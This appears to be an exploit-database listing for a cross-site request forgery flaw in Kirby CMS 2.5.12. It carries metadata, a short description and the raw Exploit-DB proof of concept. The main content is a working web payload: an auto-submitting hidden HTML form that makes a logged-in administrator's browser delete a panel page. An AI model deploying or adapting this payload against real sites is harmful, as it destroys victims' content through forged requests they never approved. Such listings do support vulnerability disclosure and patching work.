header-logo
Suggest Exploit
vendor:
Kirby
by:
Zaran Shaikh
6.8
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: Kirby
Affected Version From: 2.5.12
Affected Version To: 2.5.12
Patch Exists: NO
Related CWE: NA
CPE: a:getkirby:kirby
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Kirby CMS 2.5.12 – Cross-Site Request Forgery (Delete Page)

The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages. A crafted HTTP page with delete/ add option can be hosted on a server and upon sending the link to a user and upon click, it gets triggered and the page is added/deleted.

Mitigation:

Implementing a strong authentication mechanism and validating all user input can help mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title:​​ Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12
# CVE: NA
# Category: Web Application

# 1. Description
# The application allows malicious HTTP requests to be sent in order to
# trick a user into adding/ deleting web pages.

# 2. Proof of Concept

1. Visit the application
2. Go to add page option
3. Create a crafted HTTP page with delete/ add option and host it on
a server. Upon sending the link to a user and upon click, it gets triggered
and the page is added/deleted
4. Payload:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
      <input type="hidden" name="&#95;redirect" value="site&#47;subpages" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>